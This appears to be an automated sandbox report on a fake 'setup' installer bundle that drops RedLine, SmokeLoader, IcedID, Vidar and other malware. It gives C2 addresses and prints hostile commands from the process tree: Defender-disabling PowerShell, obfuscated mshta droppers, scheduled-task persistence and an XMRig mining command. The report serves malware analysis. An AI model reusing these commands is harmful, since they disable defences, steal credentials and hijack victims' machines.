Analysis

  • max time kernel
    949s
  • max time network
    1777s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    22-10-2021 14:39

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.9MB

  • MD5

    e4c99dcc117b45dbd02c49723df0e5da

  • SHA1

    9b31d81aa541f473360574fdbdd86aca2201033a

  • SHA256

    5bfb87691070668037df7a6bc1eac92bdb683ada3159b83c136146632835cb7f

  • SHA512

    2dc09c62ded7a3ce56b7584b2aeec228f9d7a26a1516b3d31af245c7f3513fcdb7da13cf7e47695390ee2ea02bbe5c5523c8c3f1a8780a3a6834de2e6cd416b5

Malware Config

Extracted

Family

redline

Botnet

sehrish2

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

media21

C2

91.121.67.60:23325

Extracted

Family

redline

Botnet

ChrisNEW

C2

194.104.136.5:46013

Extracted

Family

smokeloader

Version

2020

C2

http://gejajoo7.top/

http://sysaheu9.top/

rc4.i32
rc4.i32

Extracted

Family

icedid

Campaign

1875681804

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 23 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 43 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 44 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 41 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 9 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
    1⤵
      PID:500
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2056
        • C:\Users\Admin\AppData\Local\Temp\7zS80888524\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS80888524\setup_install.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:456
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2220
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3536
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2276
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3076
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri05eeb2dae7b88520a.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4328
            • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05eeb2dae7b88520a.exe
              Fri05eeb2dae7b88520a.exe
              5⤵
              • Executes dropped EXE
              PID:3424
              • C:\Users\Admin\AppData\Local\Temp\is-HONI2.tmp\Fri05eeb2dae7b88520a.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-HONI2.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$201B4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05eeb2dae7b88520a.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:4252
                • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05eeb2dae7b88520a.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05eeb2dae7b88520a.exe" /SILENT
                  7⤵
                  • Executes dropped EXE
                  PID:2836
                  • C:\Users\Admin\AppData\Local\Temp\is-HT8IV.tmp\Fri05eeb2dae7b88520a.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-HT8IV.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$A002A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05eeb2dae7b88520a.exe" /SILENT
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    • Suspicious use of FindShellTrayWindow
                    PID:4880
                    • C:\Users\Admin\AppData\Local\Temp\is-N61KC.tmp\postback.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-N61KC.tmp\postback.exe" ss1
                      9⤵
                      • Executes dropped EXE
                      PID:5864
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri05beb1e355.exe
            4⤵
              PID:3792
              • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05beb1e355.exe
                Fri05beb1e355.exe
                5⤵
                • Executes dropped EXE
                PID:2980
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Fri055cc2a6e65.exe
              4⤵
                PID:3220
                • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri055cc2a6e65.exe
                  Fri055cc2a6e65.exe
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1008
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 1836
                    6⤵
                    • Program crash
                    PID:1372
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Fri05cc28ce70b.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2648
                • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05cc28ce70b.exe
                  Fri05cc28ce70b.exe
                  5⤵
                  • Executes dropped EXE
                  PID:4208
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05cc28ce70b.exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if """" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05cc28ce70b.exe"" ) do taskkill -f /im ""%~Nxj"" " , 0 , truE ) )
                    6⤵
                      PID:3668
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05cc28ce70b.exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "" == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05cc28ce70b.exe" ) do taskkill -f /im "%~Nxj"
                        7⤵
                          PID:5316
                          • C:\Users\Admin\AppData\Local\Temp\EiV4.Exe
                            EIv4.Exe /pllbp0ygmDYA
                            8⤵
                            • Executes dropped EXE
                            PID:5408
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if ""/pllbp0ygmDYA "" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" ) do taskkill -f /im ""%~Nxj"" " , 0 , truE ) )
                              9⤵
                                PID:5508
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "/pllbp0ygmDYA " == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" ) do taskkill -f /im "%~Nxj"
                                  10⤵
                                    PID:5628
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" VBscript: clOSe ( creAteOBJECT( "WSCrIPt.sHElL" ). rUn ( "cMD /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = ""MZ"" > YAnI.V & COPy /Y /b YANI.V + L0YE_.MQ + V3DggE~.P + FAPqTQ.HJ + 51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_ " , 0 , tRuE ) )
                                  9⤵
                                    PID:4800
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = "MZ" > YAnI.V & COPy /Y /b YANI.V +L0YE_.MQ + V3DggE~.P + FAPqTQ.HJ +51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_
                                      10⤵
                                        PID:3696
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>YAnI.V"
                                          11⤵
                                            PID:5516
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" eCho "
                                            11⤵
                                              PID:6012
                                            • C:\Windows\SysWOW64\msiexec.exe
                                              msiexec /y .\W72F~U.S8_
                                              11⤵
                                              • Loads dropped DLL
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5520
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill -f /im "Fri05cc28ce70b.exe"
                                        8⤵
                                        • Kills process with taskkill
                                        PID:5520
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Fri05a277b9a3d2.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2724
                                • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05a277b9a3d2.exe
                                  Fri05a277b9a3d2.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:4956
                                  • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05a277b9a3d2.exe
                                    C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05a277b9a3d2.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5448
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Fri0575b7d291a755f8.exe
                                4⤵
                                  PID:2988
                                  • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri0575b7d291a755f8.exe
                                    Fri0575b7d291a755f8.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4816
                                    • C:\Users\Admin\AppData\Roaming\1750667.exe
                                      "C:\Users\Admin\AppData\Roaming\1750667.exe"
                                      6⤵
                                        PID:5672
                                      • C:\Users\Admin\AppData\Roaming\1417594.exe
                                        "C:\Users\Admin\AppData\Roaming\1417594.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:5584
                                      • C:\Users\Admin\AppData\Roaming\6000674.exe
                                        "C:\Users\Admin\AppData\Roaming\6000674.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:4472
                                      • C:\Users\Admin\AppData\Roaming\7550406.exe
                                        "C:\Users\Admin\AppData\Roaming\7550406.exe"
                                        6⤵
                                          PID:6412
                                        • C:\Users\Admin\AppData\Roaming\4913310.exe
                                          "C:\Users\Admin\AppData\Roaming\4913310.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          PID:6348
                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                            7⤵
                                              PID:6136
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Fri053f5694ea31c9a.exe
                                        4⤵
                                          PID:4036
                                          • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri053f5694ea31c9a.exe
                                            Fri053f5694ea31c9a.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4968
                                            • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri053f5694ea31c9a.exe
                                              C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri053f5694ea31c9a.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:5456
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Fri05890d11cdb13f95e.exe
                                          4⤵
                                            PID:3444
                                            • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05890d11cdb13f95e.exe
                                              Fri05890d11cdb13f95e.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:476
                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:5784
                                                • C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:1492
                                                • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                  7⤵
                                                    PID:6356
                                                  • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
                                                    7⤵
                                                      PID:6636
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 300
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Program crash
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:5672
                                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                      7⤵
                                                        PID:6960
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 6960 -s 1696
                                                          8⤵
                                                          • Program crash
                                                          • Checks processor information in registry
                                                          • Enumerates system info in registry
                                                          PID:1848
                                                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                        7⤵
                                                          PID:5848
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 5848 -s 1704
                                                            8⤵
                                                            • Program crash
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            PID:6468
                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                          7⤵
                                                            PID:2284
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 612
                                                              8⤵
                                                              • Program crash
                                                              • Checks processor information in registry
                                                              • Enumerates system info in registry
                                                              PID:2420
                                                          • C:\Users\Admin\AppData\Local\Temp\8.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\8.exe"
                                                            7⤵
                                                              PID:1544
                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                8⤵
                                                                • Loads dropped DLL
                                                                PID:5700
                                                            • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                              7⤵
                                                                PID:1020
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                  8⤵
                                                                    PID:6076
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                      9⤵
                                                                        PID:568
                                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                          10⤵
                                                                            PID:6892
                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                              11⤵
                                                                                PID:3012
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                  12⤵
                                                                                    PID:6548
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                  11⤵
                                                                                    PID:6504
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                      12⤵
                                                                                        PID:3860
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                          13⤵
                                                                                            PID:1096
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                            13⤵
                                                                                              PID:1224
                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                              msiexec -Y ..\lXQ2g.WC
                                                                                              13⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:5324
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill -f -iM "search_hyperfs_206.exe"
                                                                                        10⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:5972
                                                                                • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                  7⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:1296
                                                                                • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                  7⤵
                                                                                    PID:5772
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                      8⤵
                                                                                        PID:1008
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                          9⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:1884
                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                        8⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4536
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                          9⤵
                                                                                            PID:6120
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                              10⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:672
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                            9⤵
                                                                                              PID:2296
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                              9⤵
                                                                                                PID:6196
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Fri0541e16ce794d258f.exe
                                                                                      4⤵
                                                                                        PID:1860
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c Fri051e1e7444.exe
                                                                                        4⤵
                                                                                          PID:1244
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Fri05851d7f13.exe
                                                                                          4⤵
                                                                                            PID:988
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Fri05b5df5106928d62.exe
                                                                                            4⤵
                                                                                              PID:4060
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c Fri05f84fa77402bf.exe
                                                                                              4⤵
                                                                                                PID:3680
                                                                                        • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                          C:\Windows\System32\WaaSMedicAgent.exe ab027a81a9dc7e0322a306d6c1e0ca20 vGelcmMwSU2XqNVsjK6GYg.0.1.0.3.0
                                                                                          1⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:3136
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:732
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                          1⤵
                                                                                          • Checks processor information in registry
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2464
                                                                                          • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                            C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                            2⤵
                                                                                              PID:920
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05b5df5106928d62.exe
                                                                                            Fri05b5df5106928d62.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4836
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\h96SopsliqWsSSFml4Wwfz61.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\h96SopsliqWsSSFml4Wwfz61.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5148
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\LYkeys7jBh_1zSYHz_DluWKa.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\LYkeys7jBh_1zSYHz_DluWKa.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
